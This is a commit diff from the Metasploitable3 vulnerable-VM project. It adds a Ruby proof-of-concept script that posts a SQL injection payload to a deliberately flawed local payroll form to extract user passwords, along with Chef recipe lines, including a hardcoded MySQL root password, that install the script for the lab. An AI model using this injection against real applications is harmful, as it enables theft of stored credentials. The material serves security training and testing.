mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-06-30 16:55:50 +02:00
Add poc for sql injection.
parent
dc8ffbcec6
commit
bc8fb88017
|
@ -38,6 +38,7 @@ if($_POST['s']){
|
||||||
foreach ($keys as $key) {
|
foreach ($keys as $key) {
|
||||||
echo "<td>" . $row[$key] . "</td>";
|
echo "<td>" . $row[$key] . "</td>";
|
||||||
}
|
}
|
||||||
|
echo "</tr>\n";
|
||||||
}
|
}
|
||||||
$result->free();
|
$result->free();
|
||||||
}
|
}
|
||||||
|
|
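--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"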
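Review bot: poc.rb opens directly with `require 'net/http'` and has no shebang, yet the recipe in this commit installs it with `mode '0755'`, so running it as `./poc.rb` would hand the file to the shell instead of Ruby; add `#!/usr/bin/env ruby` as the first line or drop the execute bit. The script also prints `res.body` whatever the HTTP status, so a failed request and a successful demonstration look alike; a guard such as `abort "unexpected status #{res.code}" unless res.is_a?(Net::HTTPSuccess)` before the final `puts` lines would make the outcome explicit. A short header comment stating that the script exercises the deliberately vulnerable payroll_app.php form on the local VM, and what output confirms the flaw, would help readers who use it to validate detections or a later fix.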
|
@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
|
||||||
mode '0755'
|
mode '0755'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
directory '/home/vagrant/poc/payroll_app/' do
|
||||||
|
mode '0755'
|
||||||
|
owner 'vagrant'
|
||||||
|
recursive true
|
||||||
|
end
|
||||||
|
|
||||||
|
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||||
|
source 'payroll_app/poc.rb'
|
||||||
|
mode '0755'
|
||||||
|
end
|
||||||
|
|
||||||
bash 'create payroll database and import data' do
|
bash 'create payroll database and import data' do
|
||||||
code <<-EOH
|
code <<-EOH
|
||||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||||
|
|
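Review bot: The new `cookbook_file '/home/vagrant/poc/payroll_app/poc.rb'` resource sets `mode '0755'` but no owner, while the `directory` resource above it is given `owner 'vagrant'`; the file will presumably end up owned by the account running Chef, so add `owner 'vagrant'` for consistency. With `recursive true`, Chef applies `owner` and `mode` only to the leaf directory, so the intermediate `/home/vagrant/poc` is likely created with the Chef run's default ownership; declaring it as its own `directory` resource would make that explicit. A one-line comment above the two resources, saying that they ship the SQL-injection proof of concept for the lab image, would tell a reader why this script is provisioned by the recipe.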